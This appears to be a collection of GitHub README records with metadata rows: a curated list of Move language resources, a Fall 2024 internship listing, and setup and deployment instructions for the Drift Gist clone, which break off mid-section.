Move is a programming language for writing safe smart contracts originally developed at Facebook to power the Libra blockchain. Move is designed to be a platform-agnostic language to enable common libraries, tooling, and developer communities across diverse blockchains with vastly different data and execution models. Move's ambition is to become the "JavaScript of web3" in terms of ubiquity--when developers want to quickly write safe code involving assets, it should be written in Move.
## Contents
- [Overview](#overview)
- [Move-Powered Blockchains](#move-powered-blockchains)
- [Books](#books)
- [Tutorials](#tutorials)
- [Community](#community)
- [Code](#code)
- [Fungible Tokens](#fungible-tokens)
- [Non-Fungible Tokens](#non-fungible-tokens)
- [Decentralized Identity](#decentralized-identity)
- [DeFi](#defi)
- [SocialFi](#socialfi)
- [On-Chain Governance](#on-chain-governance)
- [Cross-Chain Bridge](#cross-chain-bridge)
- [Accounts](#accounts)
- [Frameworks](#frameworks)
- [Libraries](#libraries)
- [Miscellaneous](#miscellaneous)
- [Tools](#tools)
- [IDEs](#ides)
- [Package Managers](#package-managers)
- [Wallets](#wallets)
- [SDKs](#sdks)
- [Papers](#papers)
- [Language Design](#language-design)
- [Static Analysis and Verification](#static-analysis-and-verification)
- [Videos](#videos)
- [Slides](#slides)
- [Podcasts](#podcasts)
- [Blog Posts](#blog-posts)
- [Security](#security)
## Overview
- [Installation](https://github.com/move-language/move/tree/main/language/tools/move-cli#installation)
- [Problem Statement](https://github.com/mystenlabs/awesome-move/blob/main/docs/problem_statement.md#problem-statement)
## Move-Powered Blockchains
- [Sui](https://github.com/MystenLabs/sui) - A next-generation smart contract platform with high throughput, low latency, and an asset-oriented programming model powered by the Move programming language (in [devnet](https://medium.com/mysten-labs/sui-devnet-public-release-a2be304ff36b)).
- [0L](https://github.com/OLSF/libra) - A reference implementation of a neutral replicated state machine. Forked from the Libra/Diem technologies (in [mainnet](https://0l.network/)).
- [Starcoin](https://github.com/starcoinorg/starcoin) - A smart contract blockchain network that scales by layering (in [mainnet](https://stcscan.io/)).
- [Aptos](https://github.com/aptos-labs/aptos-core) - Aptos-core strives towards being the safest and most scalable layer one blockchain solution (in [mainnet](https://explorer.aptoslabs.com/?network=mainnet)).
- [Pontem](https://github.com/pontem-network/pontem) - Substrate based parachain with MoveVM onboard (in [testnet](https://polkadot.js.org/apps/?rpc=wss://testnet.pontem.network/ws#/explorer)).
- [Celo](https://github.com/celo-org/celo-blockchain) - Blockchain with EVM and MoveVM ([coming soon](https://www.businesswire.com/news/home/20210921006104/en/Celo-Sets-Sights-On-Becoming-Fastest-EVM-Chain-Through-Collaboration-With-Mysten-Labs)).
- [Diem](https://github.com/diem/diem) - The original Move-based blockchain from Meta (formerly Libra by Facebook) (discontinued).
- [ChainX](https://github.com/chainx-org/ChainX) - Bitcoin's layer-2 smart contract network; it already supports WASM and EVM, and is adding support for MoveVM (in [mainnet](https://scan.chainx.org)).
## Books
- [Move Book](https://move-language.github.io/move/) - Move book maintained by the Move core team ([中文](https://github.com/move-language/move/tree/main/language/documentation/book/translations/move-book-zh)).
- [Move Book](https://move-book.com/) - Move book maintained by [@damirka](https://github.com/damirka) ([中文](https://move-book.com/cn/)).
- [Move Patterns](https://www.move-patterns.com/) - A book on Move software design patterns maintained by [@villesundell](https://github.com/villesundell).
- [Sui Move by Example](https://examples.sui.io/) - A book on the Sui Move variant maintained by [@MystenLabs](https://github.com/MystenLabs).
## Tutorials
- [Implementing, testing, and verifying a fungible token](https://github.com/move-language/move/tree/main/language/documentation/tutorial) - Maintained by the Move core team.
- [Programming with objects](https://docs.sui.io/build/programming-with-objects) - Maintained by the Sui team.
- [Move and SmartContract Development](https://starcoinorg.github.io/starcoin-cookbook/docs/move/) - Maintained by the Starcoin team.
- [Move Language](https://imcoding.online/courses/move-language) - Interactive Move language course, free for everyone, maintained by [imcoding.online](https://imcoding.online) ([中文](https://imcoding.online/courses/move-language?lng=zh)).
## Community
- [Move Language Discord](https://discord.gg/cPUmhe24Mz)
- [Move @ Sui by Mysten Labs Discord](https://discord.gg/sui)
- [Move @ 0L Discord](https://discord.gg/0lnetwork)
- [Move @ Starcoin Discord](https://discord.gg/starcoin)
- [Move @ Aptos Discord](https://discord.gg/aptoslabs)
- [MoveChina](https://move-china.com) - The largest Chinese community for the Move programming language.
## Code
Code written in Move.
### Fungible Tokens
- [Fungible token examples](https://github.com/MystenLabs/sui/tree/main/sui_programmability/examples/fungible_tokens) - Multiple example token implementations from Sui.
- [BasicCoin](https://github.com/move-language/move/tree/main/language/documentation/examples/experimental/basic-coin) - A toy implementation of an [ERC20](https://ethereum.org/en/developers/docs/standards/tokens/erc-20/)-like fungible token.
- [Diem](https://github.com/OLSF/libra/blob/main/language/diem-framework/modules/Diem.move) - An ERC20-like token with permissioned minting/burning, see also this [spec](https://github.com/diem/dip/blob/main/dips/dip-20.md). Deployed on 0L.
- [Token](https://github.com/starcoinorg/starcoin-framework/blob/main/sources/Token.move) - Another ERC20-like Token. Deployed on Starcoin.
- [GAS](https://github.com/OLSF/libra/blob/main/language/diem-framework/modules/0L/GAS.move) - A token that instantiates the Diem standard above. Deployed on 0L.
- [STC](https://github.com/starcoinorg/starcoin-framework/blob/main/sources/STC.move) - A token that instantiates the Starcoin standard above. Deployed on Starcoin.
- [STAR](https://github.com/Elements-Studio/starswap-core/blob/master/sources/gov/STAR.move) - A governance token of Starswap dApp that powers the AMM+DEX ecosystem. Deployed on Starcoin.
- [XUSDT](https://github.com/Elements-Studio/poly-stc-contracts/blob/master/sources/asset/erc20/XUSDT.move) - A mapped asset of USDT on Starcoin.
- [XETH](https://github.com/Elements-Studio/poly-stc-contracts/blob/master/sources/asset/erc20/XETH.move) - A mapped asset of ETH on Starcoin.
- [WEN stablecoin](https://github.com/wenwenprotocol/wen-protocol) - Deployed on Starcoin.
- [FAI stablecoin](https://github.com/BFlyFinance/FAI) - An over-collateralized stable coin deployed on Starcoin.
- [FLY stablecoin](https://github.com/BFlyFinance/FLY) - An implementation of a forked OHM, deployed on Starcoin.
- [Synthetic token backed by a basket containing a reserve of other tokens](https://github.com/OLSF/libra/blob/main/language/diem-framework/modules/XDX.move) - From Diem.
- [XBTC](https://github.com/OmniBTC/OmniBridge/blob/main/aptos/bridge/sources/xbtc.move) - BTC mirror asset on Aptos.
- [XBTC](https://github.com/OmniBTC/OmniBridge/blob/main/sui/bridge/sources/xbtc.move) - BTC mirror asset on Sui.
### Non-Fungible Tokens
- [NFT examples](https://github.com/MystenLabs/sui/tree/main/sui_programmability/examples/nfts) - Multiple NFT example implementations from Sui.
- [NFT](https://github.com/starcoinorg/starcoin-framework/blob/main/sources/NFT.move) - An ERC721-like token. Deployed on Starcoin.
- [Merkle Airdrop](https://github.com/starcoinorg/starcoin-framework/blob/main/sources/MerkleNFT.move) - Utility for airdropping a large number of NFTs. Deployed on Starcoin.
- [NFT](https://github.com/diem/diem/blob/main/diem-move/diem-framework/experimental/sources/NFT.move) - An implementation of a hybrid ERC721/ERC1155-like token. From Diem.
- [BARS](https://github.com/diem/diem/blob/main/diem-move/diem-framework/experimental/sources/BARS.move) - An NFT that instantiates this hybrid standard. From Diem.
- [MultiToken](https://github.com/diem/diem/blob/main/diem-move/diem-framework/experimental/sources/MultiToken.move) - An ERC1155-like token. From Diem.
- [NFTGallery](https://github.com/diem/diem/blob/main/diem-move/diem-framework/experimental/sources/NFTGallery.move) - Utility for holding multiple NFT's of the same type. From Diem.
- [NFT Protocol](https://github.com/Origin-Byte/nft-protocol) - NFT protocol and collection framework. From OriginByte.
- [Suia](https://github.com/Mynft/suia) - The first POAP application on Sui.
### Decentralized Identity
- [aptos-cid](https://github.com/coming-chat/aptos-cid) - Decentralized identity on Aptos, the underlying account system of ComingChat.
- [MoveDID](https://github.com/NonceGeek/MoveDID) - MoveDID is a DID protocol that is compatible with Move-based blockchain networks, including Aptos, Sui, and Starcoin. Maintained by [NonceGeek](https://github.com/NonceGeek).
### DeFi
- [DeFi examples](https://github.com/MystenLabs/sui/tree/main/sui_programmability/examples/defi) - Multiple DeFi example implementations from Sui.
- [CoinSwap](https://github.com/move-language/move/tree/main/language/documentation/examples/experimental/coin-swap) - A toy implementation of a [Uniswap](https://uniswap.org/)-like liquidity pool containing two tokens.
- [Starswap](https://github.com/Elements-Studio/starswap-core) - A Uniswap-style DEX. Deployed on Starcoin.
- [Offer](https://github.com/move-language/move/blob/main/language/move-stdlib/nursery/sources/offer.move) - Generic implementation of atomic swaps for any pair of assets.
- [AptosRedPacket](https://github.com/coming-chat/aptos-red-packet) - A red packet social app that combines private chat and encrypted wallet on Aptos.
- [SuiRedPacket](https://github.com/coming-chat/sui-red-packet) - A red packet social app that combines private chat and encrypted wallet on Sui.
- [AptosAMMswap](https://github.com/OmniBTC/Aptos-AMM-swap) - Aptos AMM Swap implemented by the OmniBTC team.
- [SuiAMMswap](https://github.com/OmniBTC/Sui-AMM-swap) - Sui AMM Swap implemented by the OmniBTC team.
- [AptosOmniSwap](https://github.com/OmniBTC/OmniSwap/tree/main/aptos) - One-click swap between Aptos and EVM chains (such as ETH/BSC/AVAX) based on the cross-chain interoperability protocol Wormhole.
- [DolaProtocol](https://github.com/OmniBTC/DolaProtocol) - A decentralized omnichain liquidity aggregation protocol that uses the single-coin pools of each public chain as its core, cross-chain messaging protocols such as Wormhole and LayerZero as bridges, and the Sui chain as its settlement center.
- [ObjectMarket](https://github.com/coming-chat/object-market) - A unique object trading marketplace in the Sui network.
### SocialFi
- [Dmens](https://github.com/coming-chat/Dmens) - Decentralized Moments, a blockchain Twitter protocol built on the Sui network.
### On-Chain Governance
- [ValidatorUniverse](https://github.com/OLSF/libra/blob/main/language/diem-framework/modules/0L/ValidatorUniverse.move) - Validator set management. Deployed on 0L.
- [Oracle](https://github.com/OLSF/libra/blob/main/language/diem-framework/modules/0L/Oracle.move) - For on-chain community voting. Deployed on 0L.
- [DAO](https://github.com/starcoinorg/starcoin-framework/blob/main/sources/Dao.move) - For on-chain proposals and voting. Deployed on Starcoin.
- [DiemSystem](https://github.com/diem/diem/blob/main/diem-move/diem-framework/DPN/sources/DiemSystem.move) - Validator set management. From Diem.
- [Vote](https://github.com/diem/diem/blob/main/diem-move/diem-framework/experimental/sources/Vote.move) - On-chain voting. From Diem.
### Cross-Chain Bridge
- [Poly Bridge](https://github.com/Elements-Studio/poly-stc-contracts) - The first Cross-Chain Bridge between Move and EVM. Deployed on Starcoin.
- [OmniBTC Bridge](https://github.com/OmniBTC/OmniBridge) - A bridge between Bitcoin and Move-language public chains (like Aptos and Sui) based on an ultra-light node.
### Accounts
- [Account](https://github.com/diem/diem/blob/main/diem-move/diem-framework/core/sources/Account.move) - A generic account for Diem-powered chains. From Diem.
- [DiemAccount](https://github.com/OLSF/libra/blob/main/language/diem-framework/modules/DiemAccount.move) - Fork of the above. From 0L.
- [Account](https://github.com/starcoinorg/starcoin-framework/blob/main/sources/Account.move) - Fork of the above. From Starcoin.
### Frameworks
A Move **framework** is the set of Move modules included in the genesis state of the chain.
These modules typically implement key concepts like accounts and currencies.
The ability to separate blockchain-specific framework logic from the generic functionality of the Move language is a key part of Move's platform-agnostic design.
- [Sui Framework](https://github.com/MystenLabs/sui/tree/main/crates/sui-framework)
- [Aptos Framework](https://github.com/aptos-labs/aptos-core/tree/main/aptos-move/framework)
- [0L Framework](https://github.com/OLSF/libra/tree/main/language/diem-framework/modules/0L)
- [Starcoin Framework](https://github.com/starcoinorg/starcoin-framework)
- [Diem Framework](https://github.com/diem/diem/tree/main/diem-move/diem-framework/DPN)
### Libraries
- [Move standard library](https://github.com/move-language/move/tree/main/language/move-stdlib) - Utilities intended (but not required) to be used in every platform running Move. From the Move repo.
- [Move nursery](https://github.com/move-language/move/tree/main/language/move-stdlib/nursery) - Experimental modules that may eventually be promoted into the standard library. From the Move repo.
- [Decimal](https://github.com/OLSF/libra/blob/main/language/diem-framework/modules/0L/Decimal.move) - Efficient implementation of a decimal value. From 0L.
- [Math](https://github.com/starcoinorg/starcoin-framework/blob/main/sources/Math.move) - Math utility functions. From Starcoin.
- [Compare](https://github.com/move-language/move/blob/main/language/move-stdlib/nursery/sources/compare.move) - Polymorphic comparison (i.e., compare any two Move values of the same type). From the nursery.
- [Vault](https://github.com/move-language/move/blob/main/language/move-stdlib/nursery/sources/vault.move) - Library for capabilities. From the nursery.
- [ACL](https://github.com/move-language/move/blob/main/language/move-stdlib/nursery/sources/acl.move) - Library for list-based access control. From the nursery.
- [TaoHe](https://github.com/taoheorg/taohe) - A collection of nestable Move resources.
- [Starcoin Framework Commons](https://github.com/starcoinorg/starcoin-framework-commons) - Libraries for Move commons utility on starcoin-framework. From Starcoin.
- [Movemate](https://github.com/pentagonxyz/movemate) - Smart contract building blocks for Aptos and Sui (Math utilities, governance contracts, escrow, and more). Maintained by the Pentagon team.
- [Move cron parser](https://github.com/snowflake-so/move-cron-parser#readme) - A library built for parsing cron expressions. Maintained by the Snowflake Network team.
### Miscellaneous
- [Move-on-EVM](https://github.com/move-language/move/tree/main/language/evm) - Experimental project to compile Move source code to EVM bytecode.
- [aoc-move](https://github.com/whonore/aoc-move) - Advent of Code solutions in Move with some formal verification.
## Tools
- [Move Package Manager](https://github.com/move-language/move/tree/main/language/tools/move-cli) - Like `cargo` or `npm` for Move: single CLI (and corresponding Rust API's for other tools to hook into) for building, running, testing, debugging, and verifying Move [packages](https://move-language.github.io/move/). Maintained by the Move core team.
- [Move Prover](https://github.com/move-language/move/tree/main/language/move-prover) - Formal verification of user-defined specifications written in Move source code. Maintained by the Move core team.
- [Move Read/Write Set Analyzer](https://github.com/move-language/move/tree/main/language/tools/read-write-set) - Static analysis tool for computing an overapproximation of the global memory touched by a Move program. Maintained by the Move core team.
- [Move Playground JS Library](https://github.com/imcoding-online/js-move-playground) - Wrapping [Move Playground by Pontem](https://playground.pontem.network/) as a JavaScript library for the browser. You can use it to build your own Move Playground.
- [go-sui-indexer](https://github.com/coming-chat/go-sui-indexer) - An off-fullnode service to serve data from Sui Node.
## IDEs
- [Move VS Code plugin](https://marketplace.visualstudio.com/items?itemName=move.move-analyzer) - Maintained by the Move core team ([source code](https://github.com/move-language/move/tree/main/language/move-analyzer)).
- [Move IntelliJ plugin](https://plugins.jetbrains.com/plugin/14721-move-language) - Maintained by the Pontem team ([source code](https://github.com/pontem-network/intellij-move)).
- [Move Playground](https://playground.pontem.network/) - Like [Remix](https://remix.ethereum.org/) for Move. Alpha version of a Web IDE. See [instructions](https://gist.github.com/borispovod/64b6d23741d8c1f4b0b958a3a74aa68d). Maintained by the Pontem team.
- [Starcoin IDE](https://marketplace.visualstudio.com/items?itemName=starcoinorg.starcoin-ide) - Maintained by the Starcoin team ([source code](https://github.com/starcoinorg/starcoin-ide)).
- [Move Vim](https://github.com/rvmelkonian/move.vim) - Maintained by [@rvmelkonian](https://github.com/rvmelkonian/).
- [move-mode](https://github.com/amnn/move-mode) - Major mode for Emacs maintained by [@amnn](https://github.com/amnn/).
## Package Managers
- [Movey](https://www.movey.net/) - A crates.io-style repository of Move packages.
## Wallets
- [StarMask](https://github.com/starcoinorg/starmask-extension) - A wallet for the Starcoin blockchain. Maintained by the Starcoin team ([Chrome Webstore](https://chrome.google.com/webstore/detail/starmask/mfhbebgoclkghebffdldpobeajmbecfk?hl=en)).
- [Sui Wallet](https://github.com/MystenLabs/sui/tree/main/apps/wallet) - A chrome (v88+) extension wallet for Sui ([Chrome Webstore](https://chrome.google.com/webstore/detail/sui-wallet/opcgpfmipidbgpenhmajoajpbobppdil)).
- [Pontem Wallet](https://github.com/pontem-network/pontem-wallet) - Wallet extension for Aptos network by the Pontem team ([Chrome Webstore](https://chrome.google.com/webstore/detail/pontem-wallet/phkbamefinggmakgklpkljjmgibohnba)).
- [Fewcha Aptos Wallet](https://github.com/fewcha-wallet/fewcha.app) - The wallet of layer 1 blockchain Aptos ([Chrome Webstore](https://chrome.google.com/webstore/detail/fewcha-aptos-wallet/ebfidpplhabeedpnhjnobghokpiioolj)).
- [bcs-js](https://github.com/pontem-network/lcs-js) - JavaScript implementation of the [BCS](https://github.com/diem/bcs) serialization scheme used by Move, may be useful for implementing wallets.
- [ComingChat](https://coming.chat/) - A decentralized social finance/web3 portal. Supporting public chain wallets, such as Sui and Aptos wallets.
- [Suiet Wallet](https://github.com/suiet/suiet) - An open-source wallet for Sui. ([Chrome Webstore](https://chrome.google.com/webstore/detail/suiet/khpkpbbcccdmmclmpigdgddabeilkdpd), [Website](https://suiet.app))
- [Ethos Wallet](https://github.com/EthosWallet/chrome-extension) - Open-source chrome extension wallet for Sui ([Chrome Webstore](https://chrome.google.com/webstore/detail/ethos-sui-wallet/mcbigmjiafegjnnogedioegffbooigli), [Website](https://ethoswallet.xyz/)).
### Wallet Adapters
- [Sui Wallet](https://github.com/MystenLabs/sui/tree/main/sdk/wallet-adapter) - Sui Wallet Adapter.
- [Suiet Wallet](https://github.com/suiet/wallet-adapter) - Suiet Wallet Adapter.
### Wallet Kits
- [Suiet Wallet Kit](https://github.com/suiet/wallet-kit) - A package supporting all Sui wallets with a customizable UI.
- [Ethos Connect](https://github.com/EthosWallet/ethos-connect) - UI with built-in wallet adapter and Email option for supporting all wallets and wallet-less users on Sui.
## SDKs
### Sui SDKs
- [Rust SDK](https://docs.sui.io/devnet/build/rust-sdk) (official)
- [TS/JS SDK](https://github.com/MystenLabs/sui/tree/main/sdk/typescript) (official)
- [Golang SDK 1](https://github.com/coming-chat/go-sui-sdk) (community)
- [Golang SDK 2](https://github.com/block-vision/sui-go-sdk) (community)
- [Python SDK](https://github.com/FrankC01/pysui) (community)
- [Java SDK](https://github.com/GrapeBaBa/sui4j) (community)
- [Kotlin SDK](https://github.com/cosmostation/suikotlin) (community)
- [C# SDK](https://github.com/naami-finance/SuiNet) (community)
### Sui Dapps SDKs
- [OmniSwap-Sui-SDK](https://github.com/OmniBTC/OmniSwap-Sui-SDK) (community)
### Other network SDKs
- [Aptos Golang SDK](https://github.com/coming-chat/go-aptos-sdk) (community)
## Papers
### Language Design
- [Move: A Language With Programmable Resources](https://developers.diem.com/papers/diem-move-a-language-with-programmable-resources/2019-06-18.pdf) - This was the original Move white paper released in 2018. Many aspects of this are now out of date (e.g., the syntax and description of the bytecode instructions), but the first two sections are worth a read for explaining the difficulties of programming with assets and how Move tackles them.
- [Robust Safety for Move](https://arxiv.org/abs/2110.05043)
- [The Move Borrow Checker](https://arxiv.org/abs/2205.05181)
- [Resources: A Safe Language Abstraction for Money](https://arxiv.org/abs/2004.05106)
### Static Analysis and Verification
- [Fast and Reliable Formal Verification of Smart Contracts with the Move Prover](https://arxiv.org/abs/2110.08362)
- [The Move Prover](https://research.facebook.com/publications/the-move-prover/)
- [Verification of Programs Written in Libra's Move Language](https://ethz.ch/content/dam/ethz/special-interest/infk/chair-program-method/pm/documents/Education/Theses/Constantin_M%C3%BCller_MS_Report.pdf)
- [Exact and Linear-Time Gas-Cost Analysis](https://research.facebook.com/publications/exact-and-linear-time-gas-cost-analysis/)
## Videos
- [The Move Programming Language](https://youtu.be/J1U_0exNFu0)
- [Move on Sui](https://www.youtube.com/watch?v=xMsE1X4wio4)
- [Move on Aptos](https://www.youtube.com/watch?v=gvRJdJTQd8U)
- [Move: A Safe Language for Programming with Money](https://www.youtube.com/watch?v=EG2-7bQNPv4&ab_channel=FieldsInstitute) - Talk from [@sblackshear](https://github.com/sblackshear) at the [Fields Institute Blockchain](http://www.fields.utoronto.ca/activities/seminar_series/blockchain-research-seminar-series) research seminar series.
- [Formal Verification of Move Programs for the Libra Blockchain](http://www.fields.utoronto.ca/talks/Formal-verification-Move-programs-Libra-blockchain) - Talk from [@DavidLDill](https://github.com/DavidLDill) at the [Fields Institute Blockchain](http://www.fields.utoronto.ca/activities/seminar_series/blockchain-research-seminar-series) research seminar series.
- [Move for the Masses](https://www.youtube.com/watch?v=b_2jZ4YEfWc) - Talk at the [Converge '22](https://converge.circle.com/event/4ea0d06f-3900-4b6d-a9cd-aeaedda9ef2e/summary).
## Slides
- [Move deep dive](https://docs.google.com/presentation/d/1Tb2iZD0xrQSlwXIJNL1djNYc0_p0szfB2STgURgHgls/edit?usp=sharing)
- [Move overview](https://docs.google.com/presentation/d/1gU-M42Juz7ARc61unPXphJ_BX1OlQrBwR1VdaPT4M5w/edit?usp=sharing) - Slides from [Reasoning About Financial Systems](https://reasoningaboutfinancialsystems.org/) workshop at [SBC '22](https://cbr.stanford.edu/sbc22/).
## Podcasts
- [Move and Sui with Sam Blackshear from Mysten Labs](https://zeroknowledge.fm/228-2/)
- [Move AMA covering Move origin story](https://twitter.com/i/spaces/1jMKgepNOleJL)
## Blog Posts
- [Comparing Move and Rust smart contract development](https://medium.com/@kklas/smart-contract-development-move-vs-rust-4d8f84754a8f)
- [Comparing Diem-style Move and Sui Move](https://sui.io/resources-move/why-we-created-sui-move)
## Security
- [Aptos-movevm Denial of Service Vulnerability](https://medium.com/numen-cyber-labs/analysis-of-the-first-critical-0-day-vulnerability-of-aptos-move-vm-8c1fd6c2b98e)
## Contributing
Contributions welcome! Read the [contribution guidelines](CONTRIBUTING.md) first.
| Code and content from the Move community. | awesome,awesome-list | 0 | 41 | 87 | 136 | 6 | 2 | 2 |
bsovs/Fall2024-Internships | # Fall2024-Internships
**Should start posting in February 2024**
Collection of Fall 2024 tech internships!
Shoutout to GitHub user **[bsovs](https://github.com/bsovs)** and **[The Pitt CS Club](https://github.com/pittcsc)** for developing the initial framework and list.
---
<div align="center">
<p>
<a href="https://simplify.jobs/?invite=2d8fe25021b&utm_source=referral">
<b>Applying to internships?</b>
<br>
Autofill all your applications in a single click.
<br>
<div>
<img src="https://res.cloudinary.com/dpeo4xcnc/image/upload/v1636594918/simplify_pittcsc.png" width="450" alt="Simplify">
</div>
</a>
<sub><i>Stop manually re-entering your information. Simplify’s extension helps you autofill internship applications on millions of sites.</i></sub>
</p>
</div>
Check out the SimplifyJobs list: https://simplify.jobs/l/Top-Fall-Internships
---
To contribute:
1. Fork repository
2. Edit README.md
3. Open a pull request!
---
📈 For tips on the internship process check out the [Zero to Offer program here](https://www.pittcs.wiki/zero-to-offer). 📈
🤗 **Contribute by submitting a [pull request](https://github.com/susam/gitpr#create-pull-request)!** 🤗
:warning: **This repository is only for internships/co-ops in the United States, Canada or for Remote positions :earth_americas:.**
## The List 👔
| Name | Location | Application Period | Notes |
|---|-------------|-------------|-------------|
|[Astranis](https://simplify.jobs/p/32567b79-e4ee-4a71-bf95-11a392999a71/Software-Developer--Intern-NetworkPayload-Software-Summer-2024)| San Francisco, CA | 🔒 Closed 🔒 | Software Developer – Intern
|[Astranis](https://simplify.jobs/p/3522dad6-9198-4047-9211-3b26a01e6880/Flight-Software-Engineer--Intern-Fall-2024)| San Francisco, CA | Open | Flight Software Engineer – Intern
|[SpaceX](https://boards.greenhouse.io/spacex/jobs/7268802002?gh_jid=7268802002&gh_src=d88665492us)| <details><summary>**8 locations**</summary>Austin, TX<br /> Irvine, CA<br /> Cape Canaveral, FL<br /> Brownsville, TX<br /> Redmond, WA<br /> McGregor, TX<br /> West Athens, CA<br /> Sunnyvale, CA | Open | Fall 2024 Software Engineering Internship/Co-op
|[Rocket Lab](https://simplify.jobs/p/9165e993-19cd-48b2-930f-735e4a686343/Software--Fall-2024-Internship)| Toronto, Canada | 🔒 Closed 🔒 | Software – Fall 2024 Internship
|[Relativity Space](https://simplify.jobs/p/297bb608-e105-4492-a2ca-5ec8e5889926/Software-Engineer-Intern-Fall-2024)| Long Beach, CA | 🔒 Closed 🔒 | Software Engineer Intern
|[Tesla](https://www.tesla.com/careers/search/job/internship-software-engineer-cell-engineering-fall-2024-219030)| <details><summary>**5 locations**</summary>Palo Alto, CA<br /> Fremont, CA<br /> Austin, TX<br /> Reno, NV<br /> Toronto, ON | 🔒 Closed 🔒 | Internship, Software Engineer, Cell Engineering
| [Amazon](https://www.amazon.jobs/en/jobs/2408098/software-development-engineer-internship-2024-us) | <details><summary>**46 locations**</summary>Phoenix, AZ <br /> Tempe, AZ <br /> Berkeley, CA <br /> Culver City, CA <br /> Cupertino, CA <br /> East Palo Alto, CA <br /> Irvine, CA <br /> Los Angeles, CA <br /> Manhattan Beach, CA <br /> Palo Alto, CA <br /> San Diego, CA <br /> San Francisco, CA <br /> San Jose, CA <br /> San Luis Obispo, CA <br /> Santa Barbara, CA <br /> Santa Clara, CA <br /> Santa Cruz, CA <br /> Santa Monica, CA <br /> Sunnyvale, CA <br /> Boulder, CO <br /> Denver, CO <br /> Atlanta, GA <br /> Kennesaw, GA <br /> Chicago, IL <br /> Boston, MA <br /> Cambridge, MA <br /> Hudson, MA <br /> North Reading, MA <br /> Westborough, MA <br /> Baltimore, MD <br /> Detroit, MI <br /> Minneapolis, MN <br /> Jersey City, NJ <br /> New York, NY <br /> Portland, OR <br /> Philadelphia, PA <br /> Pittsburgh, PA <br /> Nashville, TN <br /> Austin, TX <br /> Dallas, TX <br /> Arlington, VA <br /> Herndon, VA <br /> Madison, WI <br /> Bellevue, WA <br /> Seattle, WA <br /> Redmond, WA | 🔒 Closed 🔒 | Software Development Engineer Internship
|[Rocket Lab](https://simplify.jobs/p/09b4b2ba-c6ea-49de-b902-3713f1fba5df/Quality-Engineering--Fall-2024-Internship)| Toronto, Canada | Open | Quality Engineer Intern
|[Zoox](https://simplify.jobs/p/240f0e84-5a0f-44cb-a527-00f6db58716d/Fall--Software-Engineering-InternshipCo-op-Firmware-Tools)| San Mateo, CA | Open | Software Engineering Intern
## Other Semesters
[Fall 2023 - bsovs](https://github.com/bsovs/Fall2024-Internships/tree/main/Fall2023)
[Fall 2022 - bsovs](https://github.com/bsovs/Fall2024-Internships/tree/main/Fall2022)
[Summer 2022 - (Pitt-CSC List)](https://github.com/Pitt-CSC/Summer2021-Internships)
[Fall 2021](https://github.com/BaruYogesh/Fall2021Internships)
## Contributors
jdkuffa <3
| Collection of Fall 2023 tech internships! | internship,jobs | 0 | 80 | 134 | 341 | 0 | 2 | 0 |
MaxLeiter/Drift | # <img src="src/public/assets/logo.png" height="32px" alt="" /> Drift
> **Note:** This branch is where all work is being done to refactor to the Next.js 13 app directory and React Server Components.
Drift is a self-hostable Gist clone. It's in beta, but is completely functional.
You can try a demo at https://drift.lol. The demo is built on main but has no database, so files and accounts can be wiped at any time.
If you want to contribute, need support, or want to stay updated, you can join the IRC channel at #drift on irc.libera.chat or [reach me on twitter](https://twitter.com/Max_Leiter). If you don't have an IRC client yet, you can use a webclient [here](https://demo.thelounge.chat/#/connect?join=%23drift&nick=drift-user&realname=Drift%20User).
Drift is built with Next.js 13, React Server Components, [shadcn/ui](https://github.com/shadcn/ui), and [Prisma](https://prisma.io/).
<hr />
**Contents:**
- [Setup](#setup)
- [Development](#development)
- [Production](#production)
- [Environment variables](#environment-variables)
- [Running with pm2](#running-with-pm2)
- [Running with Docker](#running-with-docker)
- [Current status](#current-status)
## Setup
### Development
In the root directory, run `pnpm i`. If you need `pnpm`, you can download it [here](https://pnpm.io/installation).
You can run `pnpm dev` in `client` for file watching and live reloading.
To work with [Prisma](https://prisma.io/), you can use `pnpm prisma` or `pnpm exec prisma` to interact with the database.
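For example, the standard Prisma CLI subcommands work through this wrapper (shown as a sketch; check the Prisma docs for the commands your workflow actually needs):
```bash
pnpm prisma migrate dev   # create/apply migrations against the configured database
pnpm prisma studio        # open Prisma Studio to browse the data in a web UI
```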
### Production
`pnpm build` will produce production code. `pnpm start` will start the Next.js server.
### Environment Variables
You can change these to your liking; a complete example file is sketched after the variable lists below.
`.env`:
- `DRIFT_URL`: the URL of the drift instance.
- `DATABASE_URL`: the URL to connect to your postgres instance. For example, `postgresql://user:password@localhost:5432/drift`.
- `WELCOME_CONTENT`: a markdown string that's rendered on the home page
- `WELCOME_TITLE`: the file title for the post on the homepage.
- `ENABLE_ADMIN`: if enabled, the first account created is an administrator account
- `REGISTRATION_PASSWORD`: the password required to register an account. If not set, no password is required.
- `NODE_ENV`: defaults to development, can be `production`
#### Auth environment variables
**Note:** Only credential auth currently supports the registration password, so if you want to secure registration, you must use only credential auth.
- `GITHUB_CLIENT_ID`: the client ID for GitHub OAuth.
- `GITHUB_CLIENT_SECRET`: the client secret for GitHub OAuth.
- `NEXTAUTH_URL`: the URL of the drift instance. Not required if hosting on Vercel.
- `CREDENTIAL_AUTH`: whether to allow username/password authentication. Defaults to `true`.
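For reference, here is a hedged sketch of what a complete `.env` could look like, combining the variables above; all values are placeholders and the exact formats (e.g. the boolean-style values) are assumptions, so adjust them to your deployment:
```
DRIFT_URL=https://drift.example.com
DATABASE_URL=postgresql://user:password@localhost:5432/drift
WELCOME_CONTENT="## Welcome to my Drift instance"
WELCOME_TITLE=Welcome
ENABLE_ADMIN=true
REGISTRATION_PASSWORD=changeme
NODE_ENV=production
# Optional: GitHub OAuth
GITHUB_CLIENT_ID=your-github-client-id
GITHUB_CLIENT_SECRET=your-github-client-secret
NEXTAUTH_URL=https://drift.example.com
CREDENTIAL_AUTH=true
```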
## Running with pm2
It's easy to start Drift using [pm2](https://pm2.keymetrics.io/).
First, add the `.env` file with your values (see the above section for the required options).
Then, use the following command to start the server:
- `pnpm build && pm2 start pnpm --name drift --interpreter bash -- start`
Refer to pm2's docs or `pm2 help` for more information.
## Running with Docker
## Running with systemd
_**NOTE:** We assume that you know how to enable user lingering if you don't want to use the systemd unit as root_
- As root
- Place the following systemd unit in ___/etc/systemd/system___ and name it _drift.service_
- Replace any occurrence of ___`$USERNAME`___ with the shell username of the user that will be running the Drift server
```
##########
# Drift Systemd Unit (Global)
##########
[Unit]
Description=Drift Server (Global)
After=default.target
[Service]
User=$USERNAME
Group=$USERNAME
Type=simple
WorkingDirectory=/home/$USERNAME/Drift
ExecStart=/usr/bin/pnpm start
Restart=on-failure
[Install]
WantedBy=default.target
```
- As a normal user
